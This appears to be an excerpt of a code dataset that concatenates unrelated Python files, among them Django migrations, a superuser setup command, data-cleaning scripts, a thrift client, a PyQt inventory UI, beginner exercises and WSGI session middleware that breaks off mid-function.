        return sum(int(line) for line in f)
20,733 | 8f79ecfef52a1b8b6815733bafaba775d12f4216 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2017-07-26 19:11
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated migration: rename Map.mapImage -> Map.mapFilePath.

    Generated by Django; do not hand-edit beyond comments -- the migration
    framework relies on the dependencies/operations structure as written.
    """
    dependencies = [
        ('APIapp', '0003_auto_20170726_1909'),
    ]
    operations = [
        migrations.RenameField(
            model_name='map',
            old_name='mapImage',
            new_name='mapFilePath',
        ),
    ]
|
20,734 | 42b98a6d21b68562b29d942e0091c4ee2db756b0 | from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from django.contrib.auth import get_user_model
User = get_user_model()
ADMIN_USERNAME = settings.ADMIN_USERNAME
ADMIN_PASSWORD = settings.ADMIN_PASSWORD
ADMIN_EMAIL = settings.ADMIN_EMAIL
ADMIN_FIREBASE_UID = settings.ADMIN_FIREBASE_UID
class Command(BaseCommand):
    """Management command that bootstraps the superuser from settings."""

    help = 'create custom superuser'

    def handle(self, *args, **options):
        """Create the configured admin account unless it already exists."""
        try:
            # Probe for an existing account; DoesNotExist means we create it.
            User.objects.get(username=ADMIN_USERNAME)
        except User.DoesNotExist:
            pass
        else:
            self.stdout.write(self.style.SUCCESS("Superuser already exists"))
            return
        try:
            User.objects.create_superuser(
                username=ADMIN_USERNAME,
                email=ADMIN_EMAIL,
                password=ADMIN_PASSWORD,
                firebase_id=ADMIN_FIREBASE_UID,
            )
        except Exception as err:
            raise CommandError('Error creating superuser: ' + str(err))
        self.stdout.write(self.style.SUCCESS("Created superuser!"))
|
20,735 | 43eef730ecf6712d5014c6a391db03de191e2a9a | import numpy as np
from keras.utils.np_utils import to_categorical
class SpectScaler:
    """class that scales spectrograms that all have the
    same number of frequency bins. Any input spectrogram
    will be scaled by subtracting off the mean of each
    frequency bin from the 'fit' set of spectrograms, and
    then dividing by the standard deviation of each
    frequency bin from the 'fit' set.
    """
    def __init__(self):
        pass
    def fit(self, spects):
        """fit a SpectScaler.
        takes a 3d array of spectrograms, aligns them all
        horizontally, and then rotates to the right 90° so
        that the columns are frequency bins. Then finds the
        mean and standard deviation of each frequency bin,
        which are used by `transform` method to
        scale other spects
        Parameters
        ----------
        spects : 3-d numpy array
            with dimensions (samples, frequency bins, time bins)
        """
        if spects.ndim != 3:
            raise ValueError('spects should be a 3-d array')
        # concatenate all spects then rotate so
        # Hz bins are columns, i.e., 'features'
        one_long_spect_rotated = np.rot90(np.hstack(spects[:, :, :]))
        # NOTE(review): np.mean/np.std are called WITHOUT axis=0, so these
        # are scalars over the whole array, not per-frequency-bin values as
        # the class docstring claims. Making them per-bin (axis=0) would
        # also break the (freq, time) - (freq,) broadcasting in _transform,
        # so confirm intended behaviour before changing either code or doc.
        self.columnMeans = np.mean(one_long_spect_rotated)
        self.columnStds = np.std(one_long_spect_rotated)
    def _transform(self, spect):
        """Z-score one spectrogram using the fitted mean/std.
        """
        return (spect - self.columnMeans) / self.columnStds
    def transform(self, spects):
        """transform spect
        """
        # Guard: fit() must have been called first to set the statistics.
        if any([not hasattr(self, attr) for attr in ['columnMeans',
                                                     'columnStds']]):
            raise AttributeError('SpectScaler properties are set to None,'
                                 'must call fit method first to set the'
                                 'value of these properties before calling'
                                 'transform')
        if spects.ndim != 3:
            raise ValueError('spects should be a 3-d array')
        z_norm_spects = np.empty(spects.shape)
        for i in range(spects.shape[0]):
            z_norm_spects[i, :, :] = self._transform(spects[i, :, :])
        return z_norm_spects
def convert_labels_categorical(labelset, labels, return_zero_to_n=False):
    """One-hot encode *labels* for use as neural-net training targets.

    Uses keras.utils.np_utils.to_categorical, so the output can feed a
    conditional crossentropy layer.

    Parameters
    ----------
    labelset : str
        alphabet of possible labels
    labels : vector
        labels to encode
    return_zero_to_n : bool
        if True, also return the labels remapped to ints 0..n-1 and the
        range of those class ints. Default is False.

    Returns
    -------
    labels_categorical : m x n 2d numpy array
    """
    num_classes = np.size(labelset)
    # to_categorical needs classes numbered 0..n-1, so map each label
    # (e.g. a char) onto its index within labelset.
    classes_zero_to_n = range(num_classes)
    label_map = {lbl: ind for ind, lbl in enumerate(labelset)}
    labels_zero_to_n = np.asarray([label_map[lbl] for lbl in labels])
    categorical = to_categorical(labels_zero_to_n, num_classes)
    if return_zero_to_n:
        return categorical, labels_zero_to_n, classes_zero_to_n
    return categorical
|
20,736 | 2038bf27c596455243d7ad54365aced111a67157 | import pandas as pd
import numpy as np
#UserInfo.tsv
# Load the tab-separated statements file (no header row); the column names
# match a LIAR-style fact-checking schema -- presumably the LIAR dataset,
# confirm against dataset/test2.tsv.
raw_data=pd.read_csv('dataset/test2.tsv',delimiter='\t',names=["sequence","id", "label", "statement", "subject","speaker","job_title",'state_info',"party","barely_true","false","half_true","mostly_true","pants_on_fire", "venue","justification"],encoding='utf-8')
# Keep only the columns used downstream and drop incomplete rows.
data = raw_data[[ "label", "statement", "subject","job_title","party","justification"]].copy()
data = data.dropna().reset_index(drop=True)
# Characters turned into a space (they usually separate words) and
# characters removed outright (punctuation and digits).
_TO_SPACE = ':;-_'
_TO_DELETE = '?,./\'"[]{}+=()&@#$%^<>|\\*~!`0123456789'
_CLEAN_TABLE = str.maketrans(_TO_SPACE, ' ' * len(_TO_SPACE), _TO_DELETE)

def remove_special_characters(column, df=None):
    """Strip punctuation and digits from df[column] in place.

    ':' ';' '-' '_' become spaces; every other special character and all
    digits are deleted. *df* defaults to the module-level ``data`` frame,
    preserving the original call signature.

    The original chained ~40 ``Series.str.replace`` calls. Besides being
    slow, several of those patterns ('?', '.', '+', '(', ...) are regex
    metacharacters, so under pandas' historical ``regex=True`` default
    they either raise or match every character. ``str.translate`` with a
    precomputed table is literal, unambiguous, and a single pass.
    """
    if df is None:
        df = data
    df[column] = df[column].str.translate(_CLEAN_TABLE)
# Clean every free-text column in place (mutates the module-level `data`).
remove_special_characters("statement")
remove_special_characters("subject")
remove_special_characters("job_title")
remove_special_characters("party")
remove_special_characters("justification")
'''
#loading vordToVec pretrained
def loadGloveModel(gloveFile):
print("Loading Glove Model")
f = open(gloveFile,'r')
model = {}
for line in f:
splitLine = line.split()
word = splitLine[0]
embedding = np.array([float(val) for val in splitLine[1:]])
model[word] = embedding
print("Done.",len(model)," words loaded!")
return model
model = loadGloveModel("glove.6B/glove.6B.100d.txt")
def convert_word_to_vec(column):
count_of_error = 0
count_total_words = 0
final_array = []
for x in data[column].to_numpy():
interim_array = []
words = x.split(" ")
for word in words:
try:
count_total_words = count_total_words +1
temp = model[word.lower()]
interim_array.append(temp)
except KeyError:
count_of_error = count_of_error + 1
continue
final_array.append(interim_array)
np.save(column,final_array)
print("Array Shape", np.array(final_array).shape)
print("Error",count_of_error)
print("Total",count_total_words)
def save_labels():
temp = []
for x in data["label"].to_numpy():
if x == 'pants-fire':
temp.append(0)
elif x == 'false':
temp.append(1)
elif x == 'barely-true':
temp.append(2)
elif x == 'half-true':
temp.append(3)
elif x == 'mostly-true':
temp.append(4)
elif x == 'true':
temp.append(5)
#print(len(temp))
save_labels()
convert_word_to_vec("statement")
convert_word_to_vec("subject")
convert_word_to_vec("job_title")
convert_word_to_vec("justification")
'''
# Persist the cleaned frame as TSV; the GloVe embedding pipeline in the
# triple-quoted block above is currently disabled.
data.to_csv(path_or_buf='dataset/test.tsv', sep='\t')
|
20,737 | 5dee2b6019ed784d7cf5236bee0ab8750af0861b | #!/usr/bin/env python
# coding:utf-8
import logging
from thrift.transport import TSocket, TTransport
from thrift.protocol import TBinaryProtocol
from pyutil.thrift.transport import SmartSocketPool
from ss_thrift_gen.data.rt_counter.CounterQueryManager import Client
from ss_thrift_gen.data.rt_counter.ttypes import *
from pyutil.program.retry_limiter import RetryLimiter
from pyutil.net.get_local_ip import get_local_ip
from ss_thrift_gen.base.ttypes import Base, BaseResp
class RtCounterServiceClient(object):
    """Python 2 thrift client for the data.rt_counter CounterQueryManager.

    Wraps a pooled, framed-transport thrift client with bounded retries.
    (Python 2 only: note the `except Exception, ex` syntax below.)
    """
    def __init__(self, product, subsys, module, timeout=0.1, conn_timeout=0.05, retries=1, cluster="data.rt_counter.online"):
        # Caller identity reported to the service: "product.subsys.module".
        self.caller = "%s.%s.%s" % (product, subsys, module)
        _transport = SmartSocketPool.TSocketPool(cluster, self.caller, timeout, conn_timeout)
        transport = TTransport.TFramedTransport(_transport)
        protocol = TBinaryProtocol.TBinaryProtocolAccelerated(transport)
        self.client = Client(protocol)
        self.client.transport = transport
        self.retries = retries
    def _call(self, api, req, msg):
        # Invoke thrift method *api* with *req*, retrying up to self.retries
        # times. Returns the thrift response, or None when every attempt
        # failed (the last error is logged with *msg* for context).
        retry_limiter = RetryLimiter("counter_service", self.retries)
        last_err_msg = ''
        while retry_limiter.can_retry():
            try:
                self.client.transport.open()
                fun = getattr(self.client, api)
                return fun(req)
            except Exception, ex:
                last_err_msg = str(ex)
            finally:
                # Close after every attempt; open() reconnects next round.
                self.client.transport.close()
        logging.warn('failed to %s after %d retries, %s',
                     msg, retry_limiter.retried(), last_err_msg)
        return None
    def get_count(self, lookup):
        # Query counters. *lookup* must contain 'counter_names' and
        # 'item_ids'; returns a list of dicts (empty on miss or error).
        if not lookup.get('counter_names') or not lookup.get('item_ids'):
            return []
        req = Request(counter_names=lookup.get('counter_names'),
                      item_ids=lookup.get('item_ids'),
                      time_slots=lookup.get('time_slots', None),
                      daily_time_slots=lookup.get('daily_time_slots', None),
                      secondary_keys=lookup.get('secondary_keys', None), cluster=lookup.get('cluster', 0),
                      Base=Base(Caller=self.caller, Addr=get_local_ip()))
        results = []
        try:
            resp = self._call('GetCount', req, 'get counter')
            if not resp or resp.BaseResp.StatusCode != 0 or not resp.counters:
                return results
            results.extend([dict(id=count.id, name=count.name, item_id=count.item_id, count=count.count,
                                 time_slot=count.time_slot, daily_time_slot=count.daily_time_slot)
                            for count in resp.counters])
        except Exception, e:
            raise e
        return results
    def write_count(self, counters):
        # Synchronous counter write.
        return self._call_write(counters, "WriteCount")
    def write_count_oneway(self, counters):
        # Fire-and-forget counter write.
        return self._call_write(counters, "WriteCountOneWay")
    def _build_write_req(self, counters):
        # Attach caller identity and local address to the write request.
        write_req = WriteRequest()
        write_req.counters = counters
        write_req.Base = Base(Caller=self.caller, Addr=get_local_ip())
        return write_req
    def _call_write(self, counters, func):
        # Send *counters* via thrift method *func*; None on failure.
        try:
            req = self._build_write_req(counters)
            resp = self._call(func, req, 'write counter')
            if not resp or resp.BaseResp.StatusCode != 0:
                return None
        except Exception as e:
            raise e
        return resp
if __name__ == '__main__':
    # Manual smoke test against the "test_table_name" counter (Python 2).
    client = RtCounterServiceClient("data", "counter", "pythontest")
    item_ids = [12432324, 58273423]
    lookup = dict(counter_names=["test_table_name"],
                  item_ids=item_ids)
    # test write
    counters = []
    # WARN name and table must set equal and special
    for item_id in item_ids:
        c = Counter()
        c.name = "test_table_name"
        c.table = "test_table_name"
        c.count = 1
        c.item_id = item_id
        counters.append(c)
    client.write_count(counters)  # test write sync
    client.write_count_oneway(counters)  # test write oneway
    # test read
    counters = client.get_count(lookup)
    for counter in counters:
        print counter['name'], counter['count'], counter['id'], counter['item_id'], counter['time_slot'], counter[
            'daily_time_slot']
|
20,738 | efa1a0ff4f49a7f8f79f5fb09be84b34dfca6e48 | import os
from whoosh import index
|
20,739 | c1c6a59acca2f89364d42cb922cb01e09799f611 | # -*- coding: utf-8 -*-
"""
Created on Fri Jul 5 15:33:40 2019
@author: DELL PC
"""
def song():
    """Print the song title."""
    print("Old town road")
song()
def artist():
    """Print the artist's name."""
    print("Lil Nas X")
artist()  # calling the function prints its output
def year():
    """Print the release year."""
    print("2019")
year()
# below there is a example for boolean
one = []
two = [0]
three = 0.0
four = None
five = True
six = 'Easy string'
# Truthiness demo: the empty list, 0.0 and None are falsy; a non-empty
# list, True and a non-empty string are truthy.
for value in (one, two, three, four, five, six):
    print(value, 'is', bool(value))
20,740 | f30c0beff0b63f2ce9ac37c1b662ed547d0958b1 | #Exercise 3
#Write a program to read through a mail log, build a histogram using a dictionary
#to count how many messages have come from each email address, and print the dictionary
fname=input('Enter a file name: ')
fhand=open(fname)
new=dict()
for line in fhand:
if line.startswith('From'):
words=line.split()
if len(words)>3:
email=words[1]
if email not in new:
new[email]=1
else:
new[email]+=1
print(new)
|
20,741 | 59d2906bb3c9e4c4393ce248b6ae85b8393f63b2 | from api.sources.getter_definition import GetterDefinition
class CptecAPIGetter(GetterDefinition):
    """Getter for the CPTEC/INPE 7-day city forecast XML, keyed by lat/lon."""

    def __init__(self, latitude, longitude):
        """Configure the base getter with the CPTEC endpoint and XML parser."""
        # {0} is filled with latitude, {1} with longitude by the base class.
        getter_config = {
            'url': 'http://servicos.cptec.inpe.br/XML/cidade/7dias/{0}/{1}/previsaoLatLon.xml',
            'parser': 'xml',
        }
        GetterDefinition.__init__(self, getter_config, latitude, longitude)
|
20,742 | 340c2139c6dbd95aa9fd4345c10246d97734ecc7 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'E:\PROGRAMMING\DESKTOP-APP\Inventory_System_via_QRcode [TUP-C_UITC]\GUI [UI_FILES]\addremoveitem.ui'
#
# Created by: PyQt5 UI code generator 5.15.1
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_addremoveitemWindow(object):
    """pyuic5-generated UI for the 'Update Inventory' window.

    Generated from addremoveitem.ui -- per the header warning, manual
    changes are lost on regeneration; regenerate with pyuic5 instead of
    editing widget geometry or styles here.
    """
    def setupUi(self, addremoveitemWindow):
        """Build and lay out all widgets on *addremoveitemWindow*."""
        addremoveitemWindow.setObjectName("addremoveitemWindow")
        addremoveitemWindow.resize(501, 671)
        addremoveitemWindow.setGeometry(700, 120, 501, 671)
        font = QtGui.QFont()
        font.setPointSize(7)
        addremoveitemWindow.setFont(font)
        icon = QtGui.QIcon()
        icon.addPixmap(QtGui.QPixmap("E:\\PROGRAMMING\\DESKTOP-APP\\Inventory_System_via_QRcode [TUP-C_UITC]\\GUI [UI_FILES]\\icons/INVENTORY.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        addremoveitemWindow.setWindowIcon(icon)
        addremoveitemWindow.setStyleSheet("background-color: rgb(223, 223, 223);")
        self.centralwidget = QtWidgets.QWidget(addremoveitemWindow)
        self.centralwidget.setObjectName("centralwidget")
        # Confirm button (disabled until an action/equipment is selected).
        self.pushButtonUpdateinventoryConfirm = QtWidgets.QPushButton(self.centralwidget)
        self.pushButtonUpdateinventoryConfirm.setEnabled(False)
        self.pushButtonUpdateinventoryConfirm.setGeometry(QtCore.QRect(70, 530, 361, 70))
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.pushButtonUpdateinventoryConfirm.sizePolicy().hasHeightForWidth())
        self.pushButtonUpdateinventoryConfirm.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(21)
        font.setBold(True)
        font.setWeight(75)
        font.setStrikeOut(False)
        font.setKerning(False)
        self.pushButtonUpdateinventoryConfirm.setFont(font)
        self.pushButtonUpdateinventoryConfirm.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
        self.pushButtonUpdateinventoryConfirm.setStyleSheet("background-color: rgb(195, 29, 57);\n"
"color: rgb(255, 255, 255);")
        self.pushButtonUpdateinventoryConfirm.setObjectName("pushButtonUpdateinventoryConfirm")
        self.labelUpdateInventoryTitle = QtWidgets.QLabel(self.centralwidget)
        self.labelUpdateInventoryTitle.setGeometry(QtCore.QRect(120, 210, 281, 31))
        font = QtGui.QFont()
        font.setPointSize(20)
        font.setBold(True)
        font.setWeight(75)
        self.labelUpdateInventoryTitle.setFont(font)
        self.labelUpdateInventoryTitle.setStyleSheet("background-color: rgb(48, 48, 48);\n"
"color: rgb(255, 255, 255);")
        self.labelUpdateInventoryTitle.setObjectName("labelUpdateInventoryTitle")
        self.labelUpdateInventoryLogo = QtWidgets.QLabel(self.centralwidget)
        self.labelUpdateInventoryLogo.setGeometry(QtCore.QRect(210, 100, 100, 100))
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.labelUpdateInventoryLogo.sizePolicy().hasHeightForWidth())
        self.labelUpdateInventoryLogo.setSizePolicy(sizePolicy)
        self.labelUpdateInventoryLogo.setStyleSheet("image: url(:/icons/icons/BOX.png);\n"
"background-color: rgb(48, 48, 48);\n"
"border-radius: 10px;")
        self.labelUpdateInventoryLogo.setText("")
        self.labelUpdateInventoryLogo.setObjectName("labelUpdateInventoryLogo")
        self.pusButtonUpdateInventoryBack = QtWidgets.QPushButton(self.centralwidget)
        self.pusButtonUpdateInventoryBack.setGeometry(QtCore.QRect(20, 20, 75, 23))
        font = QtGui.QFont()
        font.setPointSize(10)
        self.pusButtonUpdateInventoryBack.setFont(font)
        self.pusButtonUpdateInventoryBack.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
        self.pusButtonUpdateInventoryBack.setStyleSheet("background-color: rgb(195, 29, 57);\n"
"color: rgb(255, 255, 255);")
        self.pusButtonUpdateInventoryBack.setObjectName("pusButtonUpdateInventoryBack")
        self.comboBoxUpdateInventoryEquipment = QtWidgets.QComboBox(self.centralwidget)
        self.comboBoxUpdateInventoryEquipment.setEnabled(True)
        self.comboBoxUpdateInventoryEquipment.setGeometry(QtCore.QRect(70, 370, 361, 40))
        self.comboBoxUpdateInventoryEquipment.setStyleSheet("color: rgb(0, 0, 0);\n"
"background-color: rgb(255, 255, 255);\n"
"editable: rgb(65, 65, 65);")
        self.comboBoxUpdateInventoryEquipment.setEditable(False)
        self.comboBoxUpdateInventoryEquipment.setCurrentText("")
        self.comboBoxUpdateInventoryEquipment.setMaxVisibleItems(50)
        self.comboBoxUpdateInventoryEquipment.setInsertPolicy(QtWidgets.QComboBox.InsertAtBottom)
        self.comboBoxUpdateInventoryEquipment.setObjectName("comboBoxUpdateInventoryEquipment")
        # Quantity spin box, limited to 1..50 (see label text below).
        self.spinBoxUpdateInventoryQty = QtWidgets.QSpinBox(self.centralwidget)
        self.spinBoxUpdateInventoryQty.setEnabled(False)
        self.spinBoxUpdateInventoryQty.setGeometry(QtCore.QRect(70, 460, 361, 40))
        font = QtGui.QFont()
        font.setPointSize(15)
        self.spinBoxUpdateInventoryQty.setFont(font)
        self.spinBoxUpdateInventoryQty.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
        self.spinBoxUpdateInventoryQty.setStyleSheet("\n"
"color: rgb(255, 255, 255);\n"
"background-color: rgb(65, 65, 65);")
        self.spinBoxUpdateInventoryQty.setButtonSymbols(QtWidgets.QAbstractSpinBox.PlusMinus)
        self.spinBoxUpdateInventoryQty.setMinimum(1)
        self.spinBoxUpdateInventoryQty.setMaximum(50)
        self.spinBoxUpdateInventoryQty.setObjectName("spinBoxUpdateInventoryQty")
        self.labelUpdateInventoryQty = QtWidgets.QLabel(self.centralwidget)
        self.labelUpdateInventoryQty.setGeometry(QtCore.QRect(70, 430, 161, 20))
        self.labelUpdateInventoryQty.setStyleSheet("background-color: rgb(48, 48, 48);\n"
"color: rgb(255, 255, 255);")
        self.labelUpdateInventoryQty.setObjectName("labelUpdateInventoryQty")
        self.labelUpdateInventoryCard = QtWidgets.QLabel(self.centralwidget)
        self.labelUpdateInventoryCard.setGeometry(QtCore.QRect(20, 60, 461, 591))
        self.labelUpdateInventoryCard.setStyleSheet("background-color: rgb(48, 48, 48);\n"
"border-radius: 10px;")
        self.labelUpdateInventoryCard.setText("")
        self.labelUpdateInventoryCard.setObjectName("labelUpdateInventoryCard")
        # Radio-button group selecting the add/update/delete action.
        self.groupBoxUpdateInventoryChooseaction = QtWidgets.QGroupBox(self.centralwidget)
        self.groupBoxUpdateInventoryChooseaction.setGeometry(QtCore.QRect(70, 270, 361, 51))
        self.groupBoxUpdateInventoryChooseaction.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
        self.groupBoxUpdateInventoryChooseaction.setStyleSheet("color: rgb(255, 255, 255);\n"
"background-color: rgb(65, 65, 65);")
        self.groupBoxUpdateInventoryChooseaction.setObjectName("groupBoxUpdateInventoryChooseaction")
        self.radioButtonUpdateInventoryAdditem = QtWidgets.QRadioButton(self.groupBoxUpdateInventoryChooseaction)
        self.radioButtonUpdateInventoryAdditem.setGeometry(QtCore.QRect(30, 20, 111, 17))
        self.radioButtonUpdateInventoryAdditem.setStyleSheet("color: rgb(255, 255, 255);\n"
"background-color: rgb(65, 65, 65);")
        self.radioButtonUpdateInventoryAdditem.setObjectName("radioButtonUpdateInventoryAdditem")
        self.radioButtonUpdateInventoryDeleteItem = QtWidgets.QRadioButton(self.groupBoxUpdateInventoryChooseaction)
        self.radioButtonUpdateInventoryDeleteItem.setGeometry(QtCore.QRect(250, 20, 91, 17))
        self.radioButtonUpdateInventoryDeleteItem.setStyleSheet("color: rgb(255, 255, 255);\n"
"background-color: rgb(65, 65, 65);")
        self.radioButtonUpdateInventoryDeleteItem.setObjectName("radioButtonUpdateInventoryDeleteItem")
        self.radioButtonUpdateInventoryUpdateItem = QtWidgets.QRadioButton(self.groupBoxUpdateInventoryChooseaction)
        self.radioButtonUpdateInventoryUpdateItem.setGeometry(QtCore.QRect(130, 20, 111, 17))
        self.radioButtonUpdateInventoryUpdateItem.setStyleSheet("color: rgb(255, 255, 255);\n"
"background-color: rgb(65, 65, 65);")
        self.radioButtonUpdateInventoryUpdateItem.setObjectName("radioButtonUpdateInventoryUpdateItem")
        self.labelUpdateInventoryEquipment = QtWidgets.QLabel(self.centralwidget)
        self.labelUpdateInventoryEquipment.setGeometry(QtCore.QRect(70, 350, 61, 20))
        self.labelUpdateInventoryEquipment.setStyleSheet("background-color: rgb(48, 48, 48);\n"
"color: rgb(255, 255, 255);")
        self.labelUpdateInventoryEquipment.setObjectName("labelUpdateInventoryEquipment")
        # Z-order: the card label sits behind every other widget.
        self.labelUpdateInventoryCard.raise_()
        self.pushButtonUpdateinventoryConfirm.raise_()
        self.labelUpdateInventoryTitle.raise_()
        self.labelUpdateInventoryLogo.raise_()
        self.pusButtonUpdateInventoryBack.raise_()
        self.comboBoxUpdateInventoryEquipment.raise_()
        self.spinBoxUpdateInventoryQty.raise_()
        self.labelUpdateInventoryQty.raise_()
        self.groupBoxUpdateInventoryChooseaction.raise_()
        self.labelUpdateInventoryEquipment.raise_()
        addremoveitemWindow.setCentralWidget(self.centralwidget)
        self.retranslateUi(addremoveitemWindow)
        QtCore.QMetaObject.connectSlotsByName(addremoveitemWindow)
        addremoveitemWindow.setTabOrder(self.comboBoxUpdateInventoryEquipment, self.spinBoxUpdateInventoryQty)
        addremoveitemWindow.setTabOrder(self.spinBoxUpdateInventoryQty, self.pushButtonUpdateinventoryConfirm)
        addremoveitemWindow.setTabOrder(self.pushButtonUpdateinventoryConfirm, self.pusButtonUpdateInventoryBack)
    def retranslateUi(self, addremoveitemWindow):
        """Set all user-visible strings (translation hook point)."""
        _translate = QtCore.QCoreApplication.translate
        addremoveitemWindow.setWindowTitle(_translate("addremoveitemWindow", "Update Inventory - TUP-C UITC INVENTORY SYSTEM"))
        self.pushButtonUpdateinventoryConfirm.setText(_translate("addremoveitemWindow", "CONFIRM"))
        self.labelUpdateInventoryTitle.setText(_translate("addremoveitemWindow", "UPDATE INVENTORY"))
        self.pusButtonUpdateInventoryBack.setText(_translate("addremoveitemWindow", "BACK"))
        self.labelUpdateInventoryQty.setText(_translate("addremoveitemWindow", "Enter Quantity: (Max. Qty is 50)"))
        self.groupBoxUpdateInventoryChooseaction.setTitle(_translate("addremoveitemWindow", "Choose Action"))
        self.radioButtonUpdateInventoryAdditem.setText(_translate("addremoveitemWindow", "Add Item"))
        self.radioButtonUpdateInventoryDeleteItem.setText(_translate("addremoveitemWindow", "Delete Item"))
        self.radioButtonUpdateInventoryUpdateItem.setText(_translate("addremoveitemWindow", "Update Item"))
        self.labelUpdateInventoryEquipment.setText(_translate("addremoveitemWindow", "Equipment:"))
# Qt resource module (pyrcc5 output) providing the ":/icons/..." paths used
# in the style sheets; pyuic5 emits this import at the bottom of the file.
import icons

if __name__ == "__main__":
    # Standalone preview of the generated window.
    import sys
    app = QtWidgets.QApplication(sys.argv)
    addremoveitemWindow = QtWidgets.QMainWindow()
    ui = Ui_addremoveitemWindow()
    ui.setupUi(addremoveitemWindow)
    addremoveitemWindow.show()
    sys.exit(app.exec_())
|
20,743 | 6791476dec7e2b70f02875251c8cd0d919fc2aa3 | import win32clipboard as clip
import win32con
# Python 2 script: open the Windows clipboard, print its CF_TEXT contents,
# then release it (CloseClipboard must always follow OpenClipboard).
clip.OpenClipboard()
print clip.GetClipboardData(win32con.CF_TEXT)
clip.CloseClipboard()
|
20,744 | c55b96a6476a675b772dbe2f28cf13018622ab7e | # Generated by Django 2.0.5 on 2018-06-09 17:27
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated: rename accountsmodel.Type_of_Description -> Type.

    Generated by Django; do not hand-edit beyond comments.
    """
    dependencies = [
        ('accounts', '0002_auto_20180609_1632'),
    ]
    operations = [
        migrations.RenameField(
            model_name='accountsmodel',
            old_name='Type_of_Description',
            new_name='Type',
        ),
    ]
|
20,745 | 440d2321beb413e104340f699370b21a72f8c1ce | import inspect
import uuid
try:
from Cookie import SimpleCookie
except ImportError:
from http.cookies import SimpleCookie
class BaseSessionMeta(type):
    """Metaclass enforcing the minimal mapping protocol on session managers."""

    def __new__(meta, name, bases, class_dict):
        # The abstract BaseSession class itself (whose only base is object)
        # is exempt from validation.
        if bases != (object,):
            for required in ('__setitem__', '__getitem__', '__contains__'):
                candidate = class_dict.get(required)
                if not (candidate and inspect.isfunction(candidate)):
                    raise ValueError(
                        '{} must define a method called {}'.format(name, required))
        return type.__new__(meta, name, bases, class_dict)
class BaseSession(object, metaclass=BaseSessionMeta):
    """Abstract marker base for session managers; concrete subclasses must
    define __setitem__, __getitem__ and __contains__ (enforced by the
    metaclass at class-creation time)."""
    pass
class DictBasedSessionManager(BaseSession):
    """In-memory session store backed by a dict.

    Note: ``sessions`` is a class attribute, so the store is shared by
    every instance of this manager.
    """

    sessions = {}

    def __setitem__(self, id, data):
        self.sessions[id] = data

    def __getitem__(self, id):
        # Mirrors the original: a missing id yields None, not KeyError.
        return self.sessions.get(id)

    def __contains__(self, id):
        return id in self.sessions
class Session(object):
    """Minimal id-plus-data holder with dict-style item access."""

    __slots__ = ('id', 'data')

    def __init__(self):
        self.id = None
        self.data = {}

    def __setitem__(self, key, value):
        self.data[key] = value

    def __getitem__(self, key):
        return self.data[key]

    def get(self, key, default=None):
        """Return data[key], or *default* when the key is absent."""
        return self.data.get(key, default)
class SimpleSession(object):
    """Session that loads from and saves to an external manager mapping."""

    __slots__ = ('id', 'data', 'manager')

    def __init__(self, manager_inst):
        self.id = None
        self.data = {}
        self.manager = manager_inst

    def __getitem__(self, key):
        return self.data[key]

    def __setitem__(self, key, value):
        self.data[key] = value

    def get(self, key, default=None):
        """Return data[key], or *default* when the key is absent."""
        return self.data.get(key, default)

    def load(self, id):
        """Populate from the manager, or start fresh with a new random id."""
        if id in self.manager:
            self.data = self.manager[id]
            self.id = id
        else:
            self.data = {}
            self.id = uuid.uuid4().hex

    def save(self):
        """Persist the data under this session's id and return the id."""
        self.manager[self.id] = self.data
        return self.id
class SimpleSessionMiddleware(object):
    """
    This class uses the manager attribute instead of a wrapping
    function factory.
    The manager is an instance of a simple class with magic attribute
    which is easy to understand and extend.
    """

    def __init__(self, app, session_manager=DictBasedSessionManager,
                 env_key='wsgisession', cookie_key='session_id'):
        self.app = app
        self.env_key = env_key
        self.cookie_key = cookie_key
        self.manager = session_manager()

    def __call__(self, environ, start_response):
        # Recover the session id from the request cookie, if present.
        request_cookie = SimpleCookie()
        if 'HTTP_COOKIE' in environ:
            request_cookie.load(environ['HTTP_COOKIE'])
        session_id = None
        if self.cookie_key in request_cookie:
            session_id = request_cookie[self.cookie_key].value

        # Load (or freshly create) the session and expose it in environ.
        session = SimpleSession(self.manager)
        session.load(session_id)
        environ[self.env_key] = session

        def middleware_start_response(status, response_headers, exc_info=None):
            # Persist the session and hand its id back via Set-Cookie.
            saved = environ[self.env_key]
            saved.save()
            response_cookie = SimpleCookie()
            response_cookie[self.cookie_key] = saved.id
            response_cookie[self.cookie_key]['path'] = '/'
            response_headers.append(
                ('Set-Cookie',
                 response_cookie[self.cookie_key].OutputString()))
            return start_response(status, response_headers, exc_info)

        return self.app(environ, middleware_start_response)
class SessionMiddleware(object):
    """WSGI middleware that delegates session load/save to a *factory*
    (an object with load(id) -> session and save(session) -> id)."""

    def __init__(self, app, factory,
                 env_key='wsgisession', cookie_key='session_id'):
        self.app = app
        self.factory = factory
        self.env_key = env_key
        self.cookie_key = cookie_key

    def __call__(self, environ, start_response):
        # Recover the session id from the request cookie, if present.
        request_cookie = SimpleCookie()
        if 'HTTP_COOKIE' in environ:
            request_cookie.load(environ['HTTP_COOKIE'])
        session_id = None
        if self.cookie_key in request_cookie:
            session_id = request_cookie[self.cookie_key].value
        environ[self.env_key] = self.factory.load(session_id)

        def middleware_start_response(status, response_headers, exc_info=None):
            # Persist the session and return its id to the client cookie.
            saved_id = self.factory.save(environ[self.env_key])
            response_cookie = SimpleCookie()
